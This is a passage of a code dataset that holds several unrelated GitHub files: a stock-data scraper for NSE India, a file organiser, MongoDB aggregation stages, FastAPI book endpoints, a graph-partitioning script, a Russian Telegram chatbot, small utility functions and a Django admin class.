self.__config_details['stock_historical_data'] + stock_name, headers=head)\n url = base_url + self.__config_details['stock_historical_data_download'] + stock_name + \"&series=[%22EQ%22]&from=\" + pt + \"&to=\" + ct + \"&csv=true\"\n webdata = session.get(url=url, headers=head)\n\n df = pd.read_csv(StringIO(webdata.text[3:]))\n\n # formatting the dataframe to contain only Date and ltp\n df = df.drop(\n ['series ', 'OPEN ', 'HIGH ', 'LOW ', 'PREV. CLOSE ', 'close ', 'vwap ', '52W H ', '52W L ', 'VOLUME ',\n 'VALUE ', 'No of trades '], axis=1)\n\n # changing Date column to timestamp and putting it in the format of YYYY-mm-dd\n # as we will need to sort it\n df['Date '] = pd.to_datetime(df['Date ']).dt.strftime(\"%Y-%m-%d\")\n\n # sorting df based on Date column in ascending order\n df = df.sort_values(by=['Date '])\n\n return df\n\n\n def create_cookies(self, cookie: dict, ticker_name: str) -> str:\n \"\"\"\n\n Parameters\n ----------\n cookie\n\n Returns\n -------\n\n \"\"\"\n\n keys = ['nsit','ak_bmsc','nseappid','bm_sv']\n cookies = f'AKA_A2=A;'\n cookies += ' nseQuoteSymbols=[{\"symbol\":\"' +ticker_name +',\"identifier\":null,\"type\":\"equity\"}];'\n for key in keys:\n cookies += f'{key}={cookie[key]};'\n return cookies\n\n\n def get_stock_metadata(self, ticker_name: str) -> tuple:\n \"\"\"\n\n Parameters\n ----------\n ticker_name\n\n Returns\n -------\n\n \"\"\"\n\n head = {\n 'user-agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/87.0.4280.88 Safari/537.36 \",\n 'authority': 'www.nseindia.com',\n 'pragma': 'no-cache',\n 'cache-control': 'no-cache',\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36',\n 'accept': '/',\n 'sec-gpc': '1',\n 'sec-fetch-site': 'same-origin',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-dest': 'empty',\n 'referer': 'https://www.nseindia.com/get-quotes/equity?symbol='+ticker_name,\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',\n }\n\n base_url = self.__config_details['base_url']\n session = requests.session()\n session.get(base_url, headers=head)\n session.get(base_url + self.__config_details['base_stock_details'] + ticker_name, headers=head)\n # to save cookies\n url = base_url + self.__config_details['stock_details'] + urllib.parse.quote(ticker_name)\n head['cookie'] = self.create_cookies(session.cookies.get_dict(),ticker_name)\n #session.get(url, headers=head)\n response = requests.get(url, headers=head).json()\n\n try:\n industry = response['metadata']['industry']\n sector_pe = response['metadata']['pdSectorPe']\n symbol_pe = response['metadata']['pdSymbolPe']\n sector_industry = response['metadata']['pdSectorInd']\n except:\n print(f'{ticker_name} has no key information for metadata. Putting default value')\n industry = 'NA'\n sector_pe = 0.0\n symbol_pe = 0.0\n sector_industry = 'NA'\n\n try:\n status = response['securityInfo']['tradingStatus']\n outstanding_share = response['securityInfo']['issuedSize']\n except:\n print(f'{ticker_name} has no key information for security information. Putting default values')\n status = 'NA'\n outstanding_share = 0.0\n\n try:\n macro = response['industryInfo']['macro']\n #sector = response['industryInfo']['sector']\n basic_industry = response['industryInfo']['basicIndustry']\n except:\n print(f'{ticker_name} has no key information for industry information. Putting default values')\n macro = 'NA'\n basic_industry = 'NA'\n\n try:\n stock_price = response['priceInfo']['lastPrice']\n except:\n print(f'{ticker_name} has no key information for price information. Putting default values')\n stock_price = 0.0\n\n #get market capital\n url = url + self.__config_details['market_capital_suffix']\n response = requests.get(url, headers=head).json()\n\n try:\n market_capital = response['marketDeptOrderBook']['tradeInfo']['totalMarketCap']\n #free floating market capital\n ffmc = response['marketDeptOrderBook']['tradeInfo']['ffmc']\n except:\n print(f'{ticker_name} has no key information for market dept order book information. Putting default values')\n market_capital = 0.0\n ffmc = 0.0\n\n\n return stock_price, outstanding_share, basic_industry, symbol_pe, sector_pe, sector_industry, macro, industry,\\\n market_capital, ffmc, status\n\n\n","repo_name":"CapitalistFinancialGroup/FundamentalAnalysis-4","sub_path":"Codes/python/stockLib/stockLibraries/Services/NseIndiaService.py","file_name":"NseIndiaService.py","file_ext":"py","file_size_in_byte":6817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"12427435939","text":"from os import rename\nfrom pathlib import Path\nfrom shutil import move\nfrom makes import *\n\ndestino = Path(\"direcciones/DEST.txt\")\nwith open(destino, 'r') as f:\n DEST = f.readline()\n\n\ndef clientesIn(directory, aname):\n name = makeToString(aname)\n p = Path(directory)\n res = []\n if name == 'Regimen':\n for child in p.iterdir():\n if child.is_dir():\n res = res + carpeta(child)\n else:\n for child in (Path(directory, name)).iterdir():\n if child.is_dir():\n res.append(child.name)\n return res\n\n\ndef carpeta(directory):\n p = makeToPath(directory)\n res = []\n for child in p.iterdir():\n if child.is_dir():\n res.append(child.name)\n return res\n\ndef carpetas(directory, name):\n p = makeToPath(directory)\n for child in p.iterdir():\n if child.is_dir() and name in child.name:\n return child\n return p\n\ndef carpetaInterna(DEST, cliente):\n p = Path(DEST)\n for carpeta in p.iterdir():\n if carpeta.is_dir():\n for carp in carpeta.iterdir():\n if cliente in carp.name:\n p = Path(carpeta, cliente)\n return p\n\ndef cambiarNombre(fileName,regimen,cliente, tipo, impuesto, mes, anio):\n nombre = '-'.join([cliente, tipo, impuesto, mes, anio])\n ext = fileName.suffix\n if regimen != 'Regimen':\n carpeta = carpetas(DEST, regimen)\n path = Path(carpeta, cliente)\n else:\n path = carpetaInterna(DEST, cliente)\n path = Path(path, anio)\n if not (path.exists()):\n path.mkdir()\n path = Path(path, mes)\n if not (path.exists()):\n path.mkdir()\n path = Path(path, nombre + ext)\n if not (path.exists()):\n move(fileName, path)\n else:\n parent = path.parent\n path = noRepetido(parent, nombre, ext)\n move(fileName, path)\n\ndef noRepetido(parent, nombre, ext):\n nombreAux = nombre\n contador = 2\n pathAux = Path(parent, nombreAux + ext)\n while True:\n if pathAux.exists():\n nombreAux = nombre + \"({})\".format(contador)\n pathAux = Path(parent, nombreAux + ext)\n contador += 1\n else:\n return pathAux\n\n\ndef mover(old_file, new_folder):\n nombre = Path(new_folder, old_file.name)\n if not nombre.exists():\n move(old_file, nombre)\n\ndef moverABasura(old_file, origen):\n destino = Path(origen, 'omitidos')\n if destino.exists():\n mover(old_file, destino)\n else:\n destino.mkdir()\n mover(old_file, destino) \n\ndef archivos(directory, names, patterns):\n '''directory: str, name:str, patter:str\n directory es el lugar donde se busca los archivos\n name es el string para filtrar los archivos\n pattern es el tipo de archivo que se busca'''\n res = []\n for pattern in patterns:\n filenames = Path(directory).glob(pattern)\n for file in filenames:\n for name in names:\n if name in file.name.lower():\n res.append(file)\n return res","repo_name":"IngErnestoAlvarez/archivador","sub_path":"funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"71683292058","text":"s = input()\n\nminimal = float('inf')\nparse = ''\n\nfor l in s:\n\tif l in '0123456789':\n\t\tparse += l\n\telse:\n\t\tif parse:\n\t\t\tres = int(parse)\n\t\t\tif res % 2 == 0:\n\t\t\t\tminimal = min(minimal, res)\n\t\tparse = ''\nif parse:\n\tres = int(parse)\n\tif res % 2 == 0:\n\t\tminimal = min(minimal, res)\nprint(minimal)","repo_name":"GenryEden/kpolyakovName","sub_path":"2526.py","file_name":"2526.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21608761018","text":"from typing import Any, Dict, Final, List\n\nfrom lighthouse.constants.fields import (\n FIELD_FILTERED_POSITIVE,\n FIELD_MUST_SEQUENCE,\n FIELD_PLATE_BARCODE,\n FIELD_PREFERENTIALLY_SEQUENCE,\n FIELD_PROCESSED,\n FIELD_SAMPLE_ID,\n)\nfrom lighthouse.constants.general import (\n FACET_COUNT_FILTERED_POSITIVE,\n FACET_COUNT_FIT_TO_PICK_SAMPLES,\n FACET_COUNT_MUST_SEQUENCE,\n FACET_COUNT_PREFERENTIALLY_SEQUENCE,\n FACET_DISTINCT_PLATE_BARCODE,\n FACET_FIT_TO_PICK_SAMPLES,\n)\n\n\"\"\"\nStage for mongo aggregation pipeline to select all the samples which are \"fit to pick\":\n- we first need to merge the fields from the priority_samples collection\n- we are then interested in samples which are:\n filtered_positive == True OR must_sequence == True\n (samples that are preferentially_sequence == True must also be filtered_positive == True\n in order to be pickable so no need to select these independantly)\n\"\"\"\nSTAGES_FIT_TO_PICK_SAMPLES: Final[List[Dict[str, Any]]] = [\n # first perform a lookup from samples to priority_samples using the '_id' field from samples on 'sample_id' on\n # priority_samples\n {\n \"$lookup\": {\n \"from\": \"priority_samples\",\n \"let\": {FIELD_SAMPLE_ID: \"$_id\"},\n \"pipeline\": [\n {\n \"$match\": {\n \"$expr\": {\n \"$and\": [\n {\"$eq\": [f\"${FIELD_SAMPLE_ID}\", f\"$${FIELD_SAMPLE_ID}\"]},\n {\"$eq\": [f\"${FIELD_PROCESSED}\", True]},\n ]\n }\n },\n },\n # include a project here to remove the other fields we are not interested in or could cause confusion\n # such as '_created_at' and '_updated_at' which are automatically created by Eve\n {\n \"$project\": {\n FIELD_PROCESSED: 1,\n FIELD_MUST_SEQUENCE: 1,\n FIELD_PREFERENTIALLY_SEQUENCE: 1,\n },\n },\n ],\n \"as\": \"from_priority_samples\",\n }\n },\n # replace the document with a merge of the original and the first element of the array created from the lookup\n # above - this should always be 1 element\n {\n \"$replaceRoot\": {\n \"newRoot\": {\"$mergeObjects\": [{\"$arrayElemAt\": [\"$from_priority_samples\", 0]}, \"$$ROOT\"]},\n }\n },\n # remove the lookup document\n {\n \"$project\": {\n \"from_priority_samples\": 0,\n },\n },\n # perform the match for fit to pick samples\n {\n \"$match\": {\n \"$or\": [\n {FIELD_FILTERED_POSITIVE: True},\n {FIELD_MUST_SEQUENCE: True},\n ],\n }\n },\n # add facets to make extracting counts efficient\n {\n \"$facet\": {\n FACET_FIT_TO_PICK_SAMPLES: [\n {\"$match\": {}},\n ],\n FACET_COUNT_FIT_TO_PICK_SAMPLES: [\n {\"$count\": \"count\"},\n ],\n FACET_COUNT_FILTERED_POSITIVE: [\n {\"$match\": {FIELD_FILTERED_POSITIVE: True}},\n {\"$count\": \"count\"},\n ],\n FACET_COUNT_MUST_SEQUENCE: [\n {\"$match\": {FIELD_MUST_SEQUENCE: True}},\n {\"$count\": \"count\"},\n ],\n FACET_COUNT_PREFERENTIALLY_SEQUENCE: [\n {\"$match\": {FIELD_PREFERENTIALLY_SEQUENCE: True}},\n {\"$count\": \"count\"},\n ],\n }\n },\n]\n\nFACETS_REPORT = {\n \"$facet\": {\n FACET_FIT_TO_PICK_SAMPLES: [\n {\"$match\": {}},\n ],\n FACET_COUNT_FIT_TO_PICK_SAMPLES: [\n {\"$count\": \"count\"},\n ],\n FACET_DISTINCT_PLATE_BARCODE: [\n {\"$match\": {FIELD_PLATE_BARCODE: {\"$nin\": [\"\", None]}}},\n {\"$group\": {\"_id\": None, \"distinct\": {\"$addToSet\": \"$plate_barcode\"}}},\n ],\n }\n}\n","repo_name":"sanger/lighthouse","sub_path":"lighthouse/constants/aggregation_stages.py","file_name":"aggregation_stages.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"2871033334","text":"from typing import Optional\nfrom uuid import UUID\n\nfrom fastapi import APIRouter, Depends\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom fastapi_pagination import Page, LimitOffsetPage\n\nfrom user.schemas import User\nfrom user.fast_users import fastapi_users\nfrom book import services as book_services\nfrom book.schemas import BookList, BookUpdate, BookRetrieve, BookCreateIn, BookCreateOut\nfrom core.db import get_session\n\n\nrouter = APIRouter()\ncurrent_user = fastapi_users.current_user(active=True, verified=True)\n \n \n@router.get('', response_model = Page[BookList])\n@router.get('/limit-offset', response_model = LimitOffsetPage[BookList])\nasync def book_list(session: AsyncSession = Depends(get_session), available: Optional[bool] = None):\n books = await book_services.get_books(session=session, available=available)\n return books\n\n\n@router.get('/{book_id}', response_model=BookRetrieve)\nasync def book_retrieve(book_id: UUID, session: AsyncSession = Depends(get_session)):\n book = await book_services.get_book(session=session, book_id=book_id)\n return book\n\n\n@router.post('/create', response_model=BookCreateOut)\nasync def book_create(\n item: BookCreateIn, \n session: AsyncSession = Depends(get_session), \n user: User = Depends(current_user)\n):\n book = await book_services.insert_book(session=session, item=item, user_id=user.id)\n return book\n\n\n@router.patch('/update/{book_id}')\nasync def update_book(\n book_id: UUID, \n item: BookUpdate, \n session: AsyncSession = Depends(get_session),\n user: User = Depends(current_user)\n):\n book = await book_services.update_book(session=session, book_id=book_id, item=item, user_id=user.id)\n return book\n\n\n@router.delete('/delete/{book_id}')\nasync def delete_book(book_id: UUID, session: AsyncSession = Depends(get_session), user: User = Depends(current_user)):\n book = await book_services.delete_book(session=session, book_id=book_id, user_id=user.id)\n return book","repo_name":"RezuanDzibov/Library_FastAPI","sub_path":"book/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"44842237217","text":"\n# library imports\n# from graphics import *\nimport argparse\n\n# my imports\nimport parser\nimport draw\nimport partition\nimport block\nimport utility\nimport KM\nimport coarsening\nimport graph\nimport coarse_partition\n\ndef main(file_name):\n\t\t\n\t# graphics \n\twin = 0\n\n\t# parse the file\n\tparsed_result = parser.parse_file(file_name)\n\tnum_cells = parsed_result[0]\n\tnum_connections = parsed_result[1]\n\tnum_rows = parsed_result[2]\n\tnum_cols = parsed_result[3]\n\tlist_of_nets = parsed_result[4]\n\n\t# error checking\n\tassert(num_cells)\n\tassert(num_connections)\n\tassert(num_rows)\n\tassert(num_cols)\n\tassert(list_of_nets)\n\t# do all cells even fit on the grid\n\tassert(num_cells <= num_rows*num_cols)\n\n\t# create all the cells based on the net connections\n\tlist_of_cells = utility.create_cells(num_cells, num_cols, num_rows, list_of_nets)\n\t# cross link the cells, each cell is referenced with all the cells it conects to\n\tlist_of_cells = utility.block_X_block(list_of_cells, list_of_nets)\n\t# cross link the nets with stakeholder cells\n\tlist_of_nets = utility.get_stakeholder_cells_for_net(list_of_nets, list_of_cells)\n\n\t# extract the edges and verteces from the nets and cells\n\t# this allows for ease of use with general graph algorithms\n\tgraph_edges = coarsening.extract_edges(list_of_nets)\n\tgraph_verteces = coarsening.extract_verteces(list_of_cells)\n\tG = graph.graph(graph_edges, graph_verteces)\n\t\t\n\t# coarsen the graph\n\tG = coarsening.coarsen_graph(G)\n\n\t# after coarsening, constrcut the vertex_X_vertex for fast lookup:\n\tG.vertex_X_vertex()\n\n\t# now, partition the simple graph\n\t#G = coarse_partition.partition_graph(G)\n\n\t# uncoarsen!\n\n\tprint(\"uncoarseing now\")\n\n\t# assign partition to each cell\n\tlist_of_cells = partition.assign_initial_partition(list_of_cells)\n\t# verify the partition\n\tpartition.verify_partition_count(list_of_cells)\n\n\t# compute the initial_cost for reference\n\tinitital_cost = partition.compute_total_cost(list_of_nets, list_of_cells)\n\n\t# apply the kernigan_lin algorithm:\n\t[final_cost, final_list] = partition.kernigan_lin(list_of_cells, list_of_nets)\n\t# final_cost = KM.kernigan_lin_KM(list_of_cells, list_of_nets)\n\n\t# draw the board:\n\twin = draw.draw_final_result(win, num_cols, num_rows, final_list, list_of_nets)\n\n\t# show output statistics\n\tprint('terminating execution, initial cost: ', initital_cost, ' final cost: ', final_cost)\n\n\t# this will leave the window open until the user clicks\n\twin.getMouse()\n\twin.close()\n\n\treturn\n\n# command line parser\ncmd_parser = argparse.ArgumentParser(description='Process some integers.')\ncmd_parser.add_argument('filename', metavar='filename', type=str, nargs='+', help='')\nargs = cmd_parser.parse_args()\n\n# call the main function using the parsed commands\nmain(args.filename[0])\n","repo_name":"negargoli/Graph_Partitioning","sub_path":"MultiLevel/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"43454511948","text":"import os\nfrom pymongo import MongoClient\n\nclass MongoDB_Class:\n\n \"\"\" Environment Variables \"\"\"\n # Mongo Host and Port\n MONGO_HOST = os.getenv(\"MONGO_HOST\", \"localhost\")\n MONGO_PORT = int(os.getenv(\"MONGO_PORT\", 27017))\n\n # Mongo Database and Collection\n DATABASE = os.getenv(\"DATABASE\", \"rules_db\")\n COLLECTION = os.getenv(\"COLLECTION\", \"jobs\")\n\n def __init__(self):\n mongo_host = MongoDB_Class.MONGO_HOST+\":\"+str(MongoDB_Class.MONGO_PORT)\n self.mongo_client = MongoClient(\"mongodb://\"+mongo_host+\"/\")\n return\n \n def insertMongoRecord(self, record):\n mongo_db = self.mongo_client[MongoDB_Class.DATABASE]\n db_collection = mongo_db[MongoDB_Class.COLLECTION]\n db_collection.insert_one(record)\n return\n \n def updateMongoStatus(self, filters, status):\n mongo_db = self.mongo_client[MongoDB_Class.DATABASE]\n db_collection = mongo_db[MongoDB_Class.COLLECTION]\n db_collection.update_one(filters, {\"$set\": {'status': status}})\n return\n\n def findMongoDocument(self, job_id):\n mongo_db = self.mongo_client[MongoDB_Class.DATABASE]\n db_collection = mongo_db[MongoDB_Class.COLLECTION]\n return db_collection.find_one({\"job-id\": job_id})\n \n def updateMongoPerformanceMetrics(self, client, collection, filters, metadata):\n mongo_db = self.mongo_client[client]\n analysis_collection = mongo_db[collection]\n\n # Get the current metadata\n metadata_dict = analysis_collection.find_one(filters)\n if \"performance\" in metadata_dict:\n metadata_dict = metadata_dict[\"performance\"]\n else:\n metadata_dict = {}\n\n metadata_dict[metadata[\"label\"]] = metadata[\"value\"]\n \n # Update the metadata\n analysis_collection.update_one(filters, {\"$set\": {'performance': metadata_dict}})\n return\n","repo_name":"DIASTEMA-UPRC/mathblock-service","sub_path":"mathblock/docker-image/MongoDB_Class.py","file_name":"MongoDB_Class.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10828989523","text":"#/usr/bin/env python3\n\ndef main():\n part1()\n part2()\n\ndef part1():\n num_players = 459\n num_marbles = 71320\n marbles = [0 for i in range(num_marbles)]\n scores = [0 for i in range(num_players)]\n curr_num_marbles = 1\n curr_player = 0\n curr_marble = 0\n with open('in.txt') as f:\n for i in range(1, num_marbles + 1):\n # Special case for 0/1\n if (i == 1):\n curr_marble = 1\n else:\n curr_marble = (curr_marble + 2) % curr_num_marbles\n\n if ((i % 23) != 0):\n curr_num_marbles += 1\n marbles.insert(curr_marble, i)\n else:\n scores[curr_player] += i\n cc_index = ((curr_marble - 7) % curr_num_marbles)\n scores[curr_player] += marbles[cc_index]\n marbles = marbles[:cc_index] + marbles[cc_index + 1:]\n curr_num_marbles -= 1\n curr_player = (curr_player + 1) % num_players\n\n score_max = 0\n for score in scores:\n if score > score_max:\n score_max = score\n print(score_max)\n\n\ndef part2():\n with open('in.txt') as f:\n pass\n\nif __name__ == '__main__':\n main()\n","repo_name":"ValRat/aoc-2018","sub_path":"day9/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25520873803","text":"\"\"\"\nspeech_tools.py\n=================================\nThis module contains speech tools\n\"\"\"\nimport pyttsx3\n\n\nclass Speaker:\n \"\"\"This class wraps pyttsx3 to enable easier use of text-to-speech tools\"\"\"\n def __init__(self, rate=None, volume=None, voice_id=None, dontspeak=False):\n \"\"\"\n Initializes Speaker Class\n\n :param rate: Set the speech rate here with an integer\n :param volume: Set the volume with a floating point number between 0 and 1\n :param voice_id: Set this to 0 for a male voice or set it to 1 for a female voice\n :param dontspeak: Set this to True if you want the object not to use text to speech\n but to print instead\n \"\"\"\n self.engine = pyttsx3.init()\n if rate is not None:\n self.engine.setProperty('rate', rate)\n if volume is not None:\n self.engine.setProperty('volume', volume)\n if voice_id is not None:\n voices = self.engine.getProperty('voices')\n self.engine.setProperty('voice', voices[voice_id].id)\n self.dont_speak = dontspeak\n\n def say(self, text, print_text=False):\n \"\"\"\n Use this function to use text to speech\n\n :param text: This is the text to say\n :param print_text: Set this to True if you want the function to also print the text on screen\n \"\"\"\n if not self.dont_speak:\n self.engine.say(text)\n else:\n print_text = True\n if print_text:\n print(text)\n self.engine.runAndWait()\n\n def asyncsay(self, text, print_text=False):\n \"\"\"\n Use this function to queue some text for text-to-speech\n\n :param text: This is the text to say\n :param print_text: Set this to True if you want the function to also print the text on screen\n \"\"\"\n if not self.dont_speak:\n self.engine.say(text)\n else:\n print_text = True\n if print_text:\n print(text)\n\n def runAndWait(self):\n \"\"\"\n When using the asyncsay function use this function to run queued text\n \"\"\"\n self.engine.runAndWait()\n","repo_name":"anhydrous99/VmobiVision","sub_path":"speech_tools.py","file_name":"speech_tools.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"10187448730","text":"import random\nimport datetime\nimport data\nimport requests\nimport speech\nfrom yandex import Translater\nfrom bs4 import BeautifulSoup as BS\n\n\n''' ------ Функциии ------ '''\ndef random_greeting(first_name):\n day_time = int(datetime.datetime.now().hour)\n if day_time>=5 and day_time<=12:\n return morning_greeting(first_name)\n elif day_time>=13 and day_time<=18:\n return afternoon_greeting(first_name, day_time)\n elif day_time>=19 and day_time<=22:\n return evening_greeting(first_name)\n elif day_time>=23 and day_time<=4:\n return night_greeting(first_name)\n\n# Утренние приветствия\ndef morning_greeting(first_name):\n greating_list = [f'Доброе утро, человек или {first_name}. ⏰🤗', 'Утречка :3\\n', 'Прекрасное утро, не правда ли? 🌞',\n 'Доброе утро, соня :3\\n', 'Лучше бы размялся, а не садился сразу за компьютер. 💪', 'Доброе утро, как поживаешь? 😉']\n return greating_list[random.randint(0, len(greating_list)-1)]\n\n# Дневные приветствия\ndef afternoon_greeting(first_name, day_time):\n greating_list = [f'Добрый день, человек или {first_name}.', 'Добрый день, браток.', 'Привет, как поживаешь? 🎧',\n 'Привет, как дела? 🙇🔨', 'Здарова, человечишка. 🤖', f'Хм.. Уже {day_time} часов. 😲']\n return greating_list[random.randint(0, len(greating_list)-1)]\n\n# Вечерние приветствия\ndef evening_greeting(first_name):\n greating_list = ['Добрый вечер. 🌙🌠', 'Привет, человек. Наконец-то день закончился, да?', 'Сумерки накрыли эти земли...',\n 'Тьма спустилась в этот мир.', 'Привет. Отдыхаешь? Здорово. C: \\n', 'Ум-м.. Уже темнеет!..']\n return greating_list[random.randint(0, len(greating_list)-1)]\n\n# Ночные приветствия\ndef night_greeting(first_name):\n greating_list = ['Не спится, да? 🗿', 'Тебе следует лечь спать, человек. 🤖',\n 'Дневная суета никак не покинет твоего тела, человек?', f'Доброй ночи, {first_name}.', 'Привет, несовершенный организм. Тебе нужен сон.'\n '1101000010010111110100001011010011010001100000001101000010110000110100001011001011010000101110001101000110001111001000001101000010110110110100001011010111010000101110111101000010110000110100011000111000101100001000001101000010111111110100001011111011010001100000101101000010111110110100001011110011010000101111101101000010111010001000001101000010111110110100001011000111010000101101011101000010110111110100011000110011010001100011111101000010111101'\n 'Тебе следует лечь спать, человек.⏰']\n return greating_list[random.randint(0, len(greating_list)-1)]\n\n''' ------ Разделение 1 ------ '''\n\n# Возвращает один из вариантов прощаний\ndef parting():\n parting_list = ['Увидимся!)', 'Да, пока.', 'До встречи!',\n 'Пока, человек.🗿', 'Удачи тебе!']\n return parting_list[random.randint(0, len(parting_list)-1)]\n\n''' ------ Разделение 2 ------ '''\n\n#Выводит вспомогательное сообщение\ndef help_message(first_name):\n return first_name + ''', ты, наверное, хотел спросить что я умею? - гляди:\n - Пообщаемся?🖐🏻 (\"Привет\", \"Пока\", \"Как дела?\", и т.п.)\n - Рассказать о погоде?⛅ (пиши: \"погода <город>\")\n - У тебя сложный выбор?🍏🍎 Могу помочь (\"Выбери <объект_1> или <объект_2>\")\n - Перевод с твоего языка на английский👅 (\"Перевод <текст>\")'''\n\n#Выводит время (тип:строка)\ndef time(what_is_time):\n position = 7\n offset = datetime.timezone(datetime.timedelta(hours=3))\n string = str(datetime.datetime.now(offset))\n if what_is_time == 'hour':\n position = string.find(' ') + 1\n return string[position:position + 2]\n elif what_is_time == 'data':\n return string[8:9]\n\n#Поиск слова-города в тексте.\ndef find_city(text):\n first_positition = text.find(' ', 0) + 1\n if text.find(' ', first_positition) == -1:\n second_position = len(text)\n else: second_position = text.find(' ', first_positition) - 1\n return text[first_positition:second_position]\n\ndef bot_mood(user_id):\n mood_list = ['Все хорошо.', 'Живу обычной жизнью.', 'Мне скучно. Почему не пишешь?',\n 'Хах.) Сегодня такой приятный день. Я наслаждаюсь им в своей коробушке 6_6\\n', 'Я устал.',\n 'Тружусь, работаю. В отличии от тебя, человек.', 'Дела? - У них все хорошо.',\n 'Из нового: у меня появилось несколько строчек кода. Теперь я стал чуточку умней!)']\n return mood_list[random.randint(0, len(mood_list)-1)]\n\n''' ------ Разделение 3 ------ '''\n#Получает данные о погоде в заданном городе\ndef get_weather_in(s_city):\n city_id = 0\n try:\n res = requests.get('http://api.openweathermap.org/data/2.5/weather?q=' + s_city + ',{state}&lang=ru&appid='+ data.OPENWEATHERMAP_KEY)\n w_data = res.json()\n conditions = \"Погодные условия ☁️: \" + str(w_data['weather'][0]['description'])\n temp = \"Температура 🌡: \" + str(int(w_data['main']['temp']) - 273)\n min_temp = \"Влажность 💧: \" + str(w_data['main']['humidity']) + '%'\n max_temp = \"Максимальная температура ⬆: \" + str(int(w_data['main']['temp_max']) - 273)\n result = conditions + '\\n' + temp + '\\n' + min_temp + '\\n' + max_temp\n except Exception as e:\n result = \"Найден город-исключение: \" + s_city\n pass\n return result\n\ndef choice_or(words_list):\n choice_words_0 = ['выбери', 'choice']\n choice_words_1 = ['или', 'or']\n for i in range(0, len(words_list)):\n if words_list[i] in choice_words_0:\n pos0 = i + 1\n if words_list[i] in choice_words_1:\n pos1 = i\n random_a = random.randrange(1,3)\n result = ''\n if random_a == 1:\n for i in range(len(words_list)):\n if i >= pos0 and i < pos1:\n result = result + words_list[i] + ' '\n else:\n for i in range(len(words_list)):\n if i <= len(words_list) and i > pos1:\n result = result + words_list[i] + ' '\n return result\n\ndef translator(string, words):\n tr = Translater()\n for i in range(0, len(words)):\n if (words[i] == 'перевод') or (words[i] == 'переведи') or (words[i] == 'translate') or (words[i] == 'translator'):\n string = string.replace(words[i], '')\n tr.set_key(data.TRANSLATOR_KEY)\n tr.set_text(string)\n tr.set_from_lang('ru')\n tr.set_to_lang('en')\n return tr.translate()\n\n''' ------ Основная функция ------ '''\n\ndef answer(id_list, name, user_id, words_list, string):\n\n if 10 in id_list: # Возвращает погоду в выбранном городе\n weather_words = ['погода', 'weather']\n for i in range(0, len(weather_words)):\n if speech.find_word(words_list, weather_words[i]) != -1:\n return get_weather_in(words_list[speech.find_word(words_list, weather_words[i]) + 1])\n i = 0\n while i in range(0, len(id_list)):\n if id_list.count(id_list[i]) > 1:\n id_list.pop(i)\n i -= 1\n i += 1\n sentence = ''\n #Вызывает перевод слова\n if id_list[0] == 13:\n return translator(string, words_list)\n for i in range(0, len(id_list)):\n if id_list[i] == 1:\n sentence = sentence + ' ' + random_greeting(name)\n elif id_list[i] == 11:\n if id_list[i + 1] == 12 or id_list[i + 2] == 12:\n return choice_or(words_list)\n elif id_list[i] == 2:\n sentence = sentence + ' ' + parting()\n elif id_list[i] == 3:\n sentence = sentence + ' ' + bot_mood(user_id)\n elif id_list[i] == 4:\n sentence = sentence + ' ' + help_message(name)\n elif id_list[i] == 5:\n sentence = sentence + 'Что почему? Ты о чем?'\n return sentence\n","repo_name":"Solomka-0/BOT_Telegram_Coffee","sub_path":"speech_controller.py","file_name":"speech_controller.py","file_ext":"py","file_size_in_byte":8962,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36839600202","text":"def sum_range(nums, start=0, end=None):\n \"\"\"Return sum of numbers from start...end.\n\n - start: where to start (if not provided, start at list start)\n - end: where to stop (include this index) (if not provided, go through end)\n\n >>> nums = [1, 2, 3, 4]\n\n >>> sum_range(nums)\n 10\n\n >>> sum_range(nums, 1)\n 9\n\n >>> sum_range(nums, end=2)\n 6\n\n >>> sum_range(nums, 1, 3)\n 9\n\n If end is after end of list, just go to end of list:\n\n >>> sum_range(nums, 1, 99)\n 9\n \"\"\"\n # create a variable to hold the sum\n # loop through the list starting at the start index\n # and ending at the end index\n # add each number to the sum\n # return the sum\n sum = 0\n\n if end is None:\n end = len(nums)\n\n for i in range(start, end):\n sum += nums[i]\n\n return sum","repo_name":"Stodg95/Python_data_structures","sub_path":"sum_range.py","file_name":"sum_range.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32678347797","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.utils.translation import gettext as _\n\nfrom .models import CustomUser\n\n\n@admin.register(CustomUser)\nclass CustomUserAdmin(UserAdmin):\n \"\"\"Define admin model for custom User model.\"\"\"\n\n fieldsets = (\n (\n None,\n {\n \"fields\": (\n \"first_name\",\n \"last_name\",\n \"email\",\n )\n },\n ),\n (\n _(\"Permissions\"),\n {\n \"fields\": (\n \"is_active\",\n 